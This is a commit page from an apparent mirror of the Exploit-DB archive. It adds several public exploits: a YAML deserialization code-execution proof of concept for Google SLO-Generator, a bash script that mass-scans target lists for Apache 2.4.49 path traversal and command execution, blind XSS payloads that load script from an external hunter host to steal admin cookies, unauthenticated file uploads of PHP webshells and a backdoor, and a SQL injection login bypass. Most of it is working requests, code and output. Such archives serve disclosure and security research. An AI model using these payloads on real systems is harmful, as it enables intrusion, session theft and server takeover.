bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2021-10-08

Browse source 
8 changes to exploits/shellcodes

Google SLO-Generator 2.0.0 - Code Execution

Apache HTTP Server 2.4.49 - Path Traversal
Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)
Online DJ Booking Management System 1.0 - 'Multiple' Blind Cross-Site Scripting
Online Traffic Offense Management System 1.0 - Multiple SQL Injection (Unauthenticated)
Online Traffic Offense Management System 1.0 - Multiple XSS (Unauthenticated)
Online Traffic Offense Management System 1.0 - Multiple RCE (Unauthenticated)
Simple Online College Entrance Exam System 1.0 - SQLi Authentication Bypass

Windows/x86 - Bind TCP shellcode / Dynamic PEB & EDT method null-free Shellcode (415 bytes)
This commit is contained in:
Offensive Security 2021-10-08 05:02:10 +00:00
parent bd08b79b4a
commit 794d9e4342
10 changed files with 2343 additions and 5 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

24
exploits/linux/local/50385.txt Normal file
View file

@ -0,0 +1,24 @@
# Exploit Title: Google SLO-Generator 2.0.0 - Code Execution
# Date: 2021-09-28
# Exploit Author: Kiran Ghimire
# Software Link: https://github.com/google/slo-generator/releases
# Version: <= 2.0.0
# Tested on: Linux
# CVE: CVE-2021-22557
##############################################################################
*Introduction*:
Is a tool to compute and export Service Level Objectives (SLOs), Error
Budgets and Burn Rates, using configurations written in YAML (or JSON)
format.
##############################################################################
*POC:*
1. pip3 install slo-generator==2.0.0
2. 2. Save the below yaml code in a file as exploit.yaml.
!!python/object/apply:os.system ["id;whoami"]
3. Run the below command
slo-generator migrate -b exploit.yaml
##############################################################################

12
exploits/multiple/webapps/50383.sh
View file

@ -1,4 +1,4 @@
# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal # Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)
# Date: 10/05/2021 # Date: 10/05/2021
# Exploit Author: Lucas Souza https://lsass.io # Exploit Author: Lucas Souza https://lsass.io
# Vendor Homepage: https://apache.org/ # Vendor Homepage: https://apache.org/
@ -9,10 +9,14 @@
#!/bin/bash #!/bin/bash
if [[ $1 =3D=3D '' ]]; [[ $2 =3D=3D '' ]]; then if [[ $1 == '' ]]; [[ $2 == '' ]]; then
echo Set [TAGET-LIST.TXT] [PATH] echo Set [TAGET-LIST.TXT] [PATH] [COMMAND]
echo ./PoC.sh targets.txt /etc/passwd echo ./PoC.sh targets.txt /etc/passwd
exit exit
fi fi
for host in $(cat $1); do for host in $(cat $1); do
curl --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done echo $host
curl --proxy http://192.168.72.1:8080 -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done
# PoC.sh targets.txt /etc/passwd
# PoC.sh targets.txt /bin/sh whoami

49
exploits/php/webapps/50386.txt Normal file
View file

@ -0,0 +1,49 @@
# Exploit Title: Online DJ Booking Management System 1.0 - 'Multiple' Blind Cross-Site Scripting
# Date: 2021-10-06
# Exploit Author: Yash Mahajan
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/online-dj-booking-management-system-using-php-and-mysql/
# Version: V 1.0
# Vulnerable endpoint: http://localhost/odms/book-services.php?bookid=1
# Vulnerable Page URI : http://localhost/odms/admin/view-booking-detail.php?editid=10&&bookingid=989913724
# Tested on Windows 10, XAMPP
*Steps to Reproduce:*
1) Navigate http://localhost/odms/book-services.php?bookid=1
2) Enter Blind Xss payload `"><script+src=https://yourxsshunterusername.xss.ht>` in "name=","vaddress=" and "addinfo=" parameters and click on "Book".
Request:
========
POST /odms/book-services.php?bookid=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 335
Origin: http://localhost
Connection: close
Referer: http://localhost/odms/book-services.php?bookid=1
Cookie: PHPSESSID=crj216nrjq751tt0gs4o92undb
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
name="><script+src=https://biest.xss.ht></script>&email=aa@gg.com&mobnum=9999999999
&edate=2000-10-24&est=6+p.m&eetime=1+p.m&vaddress="><script+src=https://biest.xss.ht></script>
&eventtype=Pre+Engagement&addinfo="><script+src=https://biest.xss.ht></script>&submit=Book
Now to confirm the vulnerability
3) Login as admin by navigating to http://localhost/odms/admin/login.php.
4) Now as soon as admin visits /view-booking-detail.php to approve the booking, payload fires and attacker will get the details like ip address, cookies of admin
5) Able to steal admin's cookies successfully!!
#POC
https://ibb.co/Vj3jn2d
https://ibb.co/bm9MGdG

1191
exploits/php/webapps/50387.txt Normal file
View file

File diff suppressed because it is too large Load diff

251
exploits/php/webapps/50388.txt Normal file
View file

@ -0,0 +1,251 @@
# Exploit Title: Online Traffic Offense Management System 1.0 - Multiple XSS (Unauthenticated)
# Date: 07/10/2021
# Exploit Author: Hubert Wojciechowski
# Contact Author: snup.php@gmail.com
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
# Version: 1.0
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
### XSS Stored and XSS Reflected
# All requests can be sent by both an authenticated and a non-authenticated user
# XSS Stored - example vulnerable pages and parameters:
* The entire application is susceptible to Stored XSS vulnerabilities, below are examples of pages and parameters
* We can upload SVG file from XSS to all places in webapp
* We can add evil code from admin account, regular user account and unauthenticated - we needs only request
* http://localhost/traffic_offense/admin/?page=user
Parameters:
- firstname
- lastname
- user image - svg file with javascript code - XSS
* http://localhost/traffic_offense/classes/Master.php?f=save_offense_record
Parameters:
- date_created
- ticket_no
- officer_id
- officer_name
- status
- remarks
- SVG file with javascript code - XSS
* All application is vulnerable
# XSS Reflected - example vulnerable pages and parameters:
* http://localhost/traffic_offense/admin/?page
Parameters:
- page
* http://localhost/traffic_offense/classes/Login.php
Parameters:
- username
- password
* http://localhost/traffic_offense/*/&id=1 [all pages where the id parameter is present]
Parameters:
- id
* http://localhost/traffic_offense/classes/Master.php
Parameters:
- id
* http://localhost/traffic_offense/classes/Users.php
Parameters:
- id
-----------------------------------------------------------------------------------------------------------------------
# POC
-----------------------------------------------------------------------------------------------------------------------
## Example 1 - XSS Reflected
# Request using POST method, payload is in the parameter value id
POST /traffic_offense/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------21986352462593413643786432583
Content-Length: 1061
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=user
Cookie: PHPSESSID=vt0b3an93oqfgacv02oqnvmb0o
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------21986352462593413643786432583
Content-Disposition: form-data; name="id"
13<script>alert(1)</script>37
-----------------------------21986352462593413643786432583
Content-Disposition: form-data; name="firstname"
hacked
[...]
-----------------------------------------------------------------------------------------------------------------------
# Response
HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 01:05:26 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 186
Connection: close
Content-Type: text/html; charset=UTF-8
UPDATE users set firstname = 'sdasfd' , lastname = 'fdxfd' , username = 'test2' , `password` = 'ad0234829205b9033196ba818f7a872b' where id = 13<script>alert(1)</script>37
-----------------------------------------------------------------------------------------------------------------------
# Request using GET method, payload is in the parameter value id
GET /traffic_offense/admin/offenses/view_details.php?id=13<script>alert(1)</script>37' HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
-----------------------------------------------------------------------------------------------------------------------
# Response
HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 05:28:35 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 7893
Connection: close
Content-Type: text/html; charset=UTF-8
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''13<script>alert(1)</script>37''' at line 1
SELECT r.*,d.license_id_no, d.name as driver from `offense_list` r inner join `drivers_list` on r.driver_id = d.id where r.id = '13<script>alert(1)</script>37'' <br />
[...]
-----------------------------------------------------------------------------------------------------------------------
## Example 2
# XSS Stored
# Save JS payload in user profile and add SVG file from vuln script
POST /traffic_offense/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------85748650716762987124528102
Content-Length: 4304
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=user
Cookie: PHPSESSID=vt0b3an93oqfgacv02oqnvmb0o
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------85748650716762987124528102
Content-Disposition: form-data; name="id"
1
-----------------------------85748650716762987124528102
Content-Disposition: form-data; name="firstname"
admin"/><img src=x onmouseover=alert(1)>
-----------------------------85748650716762987124528102
Content-Disposition: form-data; name="lastname"
admin"/><img src=x onmouseover=alert(1)>
-----------------------------85748650716762987124528102
Content-Disposition: form-data; name="username"
admin
-----------------------------85748650716762987124528102
Content-Disposition: form-data; name="password"
admnin123
-----------------------------85748650716762987124528102
Content-Disposition: form-data; name="img"; filename="xss.svg"
Content-Type: image/svg+xml
[...]SVG PAYLOAD[...]
-----------------------------------------------------------------------------------------------------------------------
# Response
HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 05:31:29 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8
1
-----------------------------------------------------------------------------------------------------------------------
# Request download new user data
GET /traffic_offense/admin/?page=user/manage_user&id=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
-----------------------------------------------------------------------------------------------------------------------
# Response
HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 05:42:04 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24719
[...]
<div class="form-group col-6">
<label for="name">First Name</label>
<input type="text" name="firstname" id="firstname" class="form-control" value="admin"/><img src=x onmouseover=alert(1)>" required>
</div>
<div class="form-group col-6">
<label for="name">Last Name</label>
<input type="text" name="lastname" id="lastname" class="form-control" value="admin"/><img src=x onmouseover=alert(1)>" required>
</div>
[...]
<div class="form-group col-6 d-flex justify-content-center">
<img src="http://localhost/traffic_offense/uploads/1633584660_xss.svg" alt="" id="cimg" class="img-fluid img-thumbnail">
</div>
[...]

457
exploits/php/webapps/50389.txt Normal file
View file

@ -0,0 +1,457 @@
# Exploit Title: Online Traffic Offense Management System 1.0 - Multiple RCE (Unauthenticated)
# Date: 07/10/2021
# Exploit Author: Hubert Wojciechowski
# Contact Author: snup.php@gmail.com
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
# Version: 1.0
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
### RCE - Remote Code Execution
# All requests can be sent by both an authenticated and a non-authenticated user
# RCE - we can exploit the RCE vulnerability in several ways:
* Drivers List can add any attachment as photo - http://localhost/traffic_offense/classes/Master.php?f=save_driver
* System information file add as system logo or portal cover - http://localhost/traffic_offense/admin/?page=system_info
* User profile edit avatar - http://localhost/traffic_offense/admin/?page=user
* Make new user and add evil avatar - http://localhost/traffic_offense/admin/?page=user/manage_user
* Edit other user and change his avatar to webshell - http://localhost/traffic_offense/admin/?page=user/manage_user&id=2
-----------------------------------------------------------------------------------------------------------------------
# POC
-----------------------------------------------------------------------------------------------------------------------
## Example 1
# Request send as Unauthenticated user
POST /traffic_offense/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------210106920639395210803657370685
Content-Length: 1184
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=user/manage_user
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="id"
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="firstname"
hacked
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="lastname"
hacked
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="username"
hacked
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="password"
hacked
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="type"
1
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="img"; filename="cmd.php"
Content-Type: application/octet-stream
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="x">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<?php
if($_REQUEST['x']) {
system($_REQUEST['x']);
} else phpinfo();
?>
</pre>
</BODY></HTML>
-----------------------------210106920639395210803657370685--
-----------------------------------------------------------------------------------------------------------------------
# Response
HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 07:59:24 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Set-Cookie: PHPSESSID=97gjq4viadndhvi8hvsk9d7v7i; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8
1
-----------------------------------------------------------------------------------------------------------------------
# The file was uploaded to the uploads directory
# Request to list files in uploads\
GET /traffic_offense/uploads/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
-----------------------------------------------------------------------------------------------------------------------
# Response
HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 08:06:35 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
Access-Control-Allow-Origin: *
Content-Length: 2139
Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /traffic_offense/uploads</title>
</head>
<body>
<h1>Index of /traffic_offense/uploads</h1>
<table>
<tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
<tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/traffic_offense/">Parent Directory</a> </td><td>&nbsp;</td><td align="right"> - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/image2.gif" alt="[IMG]"></td><td><a href="1629336240_avatar.jpg">1629336240_avatar.jpg</a> </td><td align="right">2021-08-19 09:24 </td><td align="right"> 11K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/image2.gif" alt="[IMG]"></td><td><a href="1629421080_tl-logo.png">1629421080_tl-logo.png</a> </td><td align="right">2021-08-20 08:58 </td><td align="right">5.2K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/image2.gif" alt="[IMG]"></td><td><a href="1633584660_xss.svg">1633584660_xss.svg</a> </td><td align="right">2021-10-07 07:31 </td><td align="right">3.4K</td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="1633593540_cmd.php">1633593540_cmd.php</a> </td>
[...]
-----------------------------------------------------------------------------------------------------------------------
# Request to webshell
GET /traffic_offense/uploads/1633593540_cmd.php?x=dir HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
-----------------------------------------------------------------------------------------------------------------------
# Response
HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 08:10:10 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Access-Control-Allow-Origin: *
Content-Length: 810
Connection: close
Content-Type: text/html; charset=UTF-8
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
Volume in drive C has no label.
Volume Serial Number is 283C-C6A0
Directory of C:\xampp\htdocs\traffic_offense\uploads
07.10.2021 10:09 <DIR> .
07.10.2021 10:09 <DIR> ..
19.08.2021 09:24 11ÿ426 1629336240_avatar.jpg
20.08.2021 08:58 5ÿ288 1629421080_tl-logo.png
07.10.2021 07:31 3ÿ451 1633584660_xss.svg
07.10.2021 09:59 252 1633593540_cmd.php
07.10.2021 10:02 252 1633593720_cmd.php
07.10.2021 09:02 <DIR> drivers
5 File(s) 20ÿ669 bytes
3 Dir(s) 86ÿ494ÿ085ÿ120 bytes free
</pre>
</BODY></HTML>
-----------------------------------------------------------------------------------------------------------------------
## Example 2
# Webshell as System Logo and next webshell as Potal Cover in System Information page
# Request
POST /traffic_offense/classes/SystemSettings.php?f=update_settings HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------339921602532596419562348365833
Content-Length: 3176
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=system_info
Cookie: PHPSESSID=97gjq4viadndhvi8hvsk9d7v7i
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------339921602532596419562348365833
Content-Disposition: form-data; name="name"
Online Traffic Offense Management System - PHP
-----------------------------339921602532596419562348365833
Content-Disposition: form-data; name="short_name"
OTOMS - PHP
-----------------------------339921602532596419562348365833
Content-Disposition: form-data; name="about_us"
<p style="text-align: center; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding: 0px; font-family: DauphinPlain; font-size: 70px; line-height: 90px;">About Us</p><hr style="margin: 0px; padding: 0px; clear: both; border-top: 0px; height: 1px; background-image: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.75), rgba(0, 0, 0, 0));"><div id="Content" style="margin: 0px; padding: 0px; position: relative;"><div id="bannerL" style="margin: 0px 0px 0px -160px; padding: 0px; position: sticky; top: 20px; width: 160px; height: 10px; float: left; text-align: right; color: rgb(0, 0, 0); font-family: " open="" sans",="" arial,="" sans-serif;="" font-size:="" 14px;="" background-color:="" rgb(255,="" 255,="" 255);"=""></div><div id="bannerR" style="margin: 0px -160px 0px 0px; padding: 0px; position: sticky; top: 20px; width: 160px; height: 10px; float: right; color: rgb(0, 0, 0); font-family: " open="" sans",="" arial,="" sans-serif;="" font-size:="" 14px;="" background-color:="" rgb(255,="" 255,="" 255);"=""></div><div class="boxed" style="margin: 10px 28.7969px; padding: 0px; clear: both; color: rgb(0, 0, 0); font-family: " open="" sans",="" arial,="" sans-serif;="" font-size:="" 14px;="" text-align:="" center;="" background-color:="" rgb(255,="" 255,="" 255);"=""><div id="lipsum" style="margin: 0px; padding: 0px; text-align: justify;"></div></div></div><p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px;">Sample only</p>
-----------------------------339921602532596419562348365833
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream
-----------------------------339921602532596419562348365833
Content-Disposition: form-data; name="img"; filename="cmd.php"
Content-Type: application/octet-stream
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<?php
if($_REQUEST['x']) {
system($_REQUEST['x']);
} else phpinfo();
?>
</pre>
</BODY></HTML>
-----------------------------339921602532596419562348365833
Content-Disposition: form-data; name="cover"; filename="list.php"
Content-Type: application/octet-stream
<?php
if($_GET['file']) {
$fichero=$_GET['file'];
} else {
$fichero="/";
}
if($handle = @opendir($fichero)) {
while($filename = readdir($handle)) {
echo "( ) <a href=?file=" . $fichero . "/" . $filename . ">" . $filename . "</a><br>";
}
closedir($handle);
} else {
echo "FILE: " . $fichero . "<br><hr><pre>";
$fp = fopen($fichero, "r");
$buffer = fread($fp, filesize($fichero));
echo $buffer;
fclose($fp);
}
?>
-----------------------------339921602532596419562348365833--
-----------------------------------------------------------------------------------------------------------------------
# Response
HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 08:21:35 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8
1
-----------------------------------------------------------------------------------------------------------------------
# The situation is the same as in the previous variant. Two files ripped into the uploads directory, 1633595040_list.php and 1633595040_cmd.php
## Example 3
# Webshell as photo in driver list page
# Request
POST /traffic_offense/classes/Master.php?f=save_driver HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------12210274961293066124133837204
Content-Length: 2148
Origin: http://localhost
Connection: close
Referer: http://localhost/traffic_offense/admin/?page=drivers/manage_driver
Cookie: PHPSESSID=97gjq4viadndhvi8hvsk9d7v7i
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="id"
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="license_id_no"
vvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="lastname"
vvvvvvvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="firstname"
vvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="middlename"
vvvvvvvvvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="dob"
2021-10-07
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="present_address"
vvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="permanent_address"
vvvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="civil_status"
Single
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="nationality"
vvvvvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="contact"
vvvvvvvv
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="license_type"
Student
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="image_path"
-----------------------------12210274961293066124133837204
Content-Disposition: form-data; name="img"; filename="simple-backdoor.php"
Content-Type: application/octet-stream
<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
<!-- http://michaeldaw.org 2006 -->
-----------------------------12210274961293066124133837204--
-----------------------------------------------------------------------------------------------------------------------
# Response
HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 08:35:21 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8
{"status":"success"}
-----------------------------------------------------------------------------------------------------------------------
# Request to webshell
GET /traffic_offense/uploads/drivers/19.php?cmd=whoami HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
-----------------------------------------------------------------------------------------------------------------------
# Response
HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 08:39:15 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Access-Control-Allow-Origin: *
Content-Length: 95
Connection: close
Content-Type: text/html; charset=UTF-8
<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
<pre>desktop-uhrf0c6\hubert
</pre>

31
exploits/php/webapps/50390.txt Normal file
View file

@ -0,0 +1,31 @@
# Exploit Title: Simple Online College Entrance Exam System 1.0 - SQLi Authentication Bypass
# Date: 07.10.2021
# Exploit Author: Mevlüt Yılmaz
# Vendor Homepage: https://www.sourcecodester.com/php/14976/simple-online-college-entrance-exam-system-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14976&title=Simple+Online+College+Entrance+Exam+System+in+PHP+and+SQLite+Free+Source+Code
# Version: 1.0
# Tested on: Windows 10, Kali Linux
# Simple Online College Entrance Exam System v1.0 Login page can be bypassed with a simple SQLi to the username parameter.
Steps To Reproduce:
1 - Go to the login page http://localhost/entrance_exam/admin/login.php
2 - Enter the payload to username field as "admin' or '1'='1" without double-quotes and type anything to password field.
3 - Click on "Login" button and you are logged in as administrator.
PoC
POST /entrance_exam/Actions.php?a=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 45
Origin: http://localhost
Connection: close
Referer: http://localhost/entrance_exam/admin/login.php
Cookie: PHPSESSID=57upokqf37b2fjs4o5tc84cd8n
username=admin'+or+'1'%3D'1&password=anything

8
files_exploits.csv
View file

@ -11395,6 +11395,7 @@ id,file,description,date,author,type,platform,port
